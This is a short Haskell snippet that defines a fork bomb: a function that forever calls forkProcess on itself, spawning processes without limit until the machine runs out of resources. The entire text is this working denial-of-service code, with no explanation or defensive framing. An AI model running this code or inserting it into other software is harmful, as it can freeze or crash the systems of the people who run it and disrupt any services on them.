import Control.Monad
import System.Posix.Process
 
forkBomb = forever $ forkProcess forkBomb
